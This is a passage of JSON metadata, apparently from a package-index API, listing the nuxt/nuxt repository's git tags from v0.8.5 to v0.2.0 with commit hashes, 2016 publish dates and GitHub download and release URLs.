nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.eco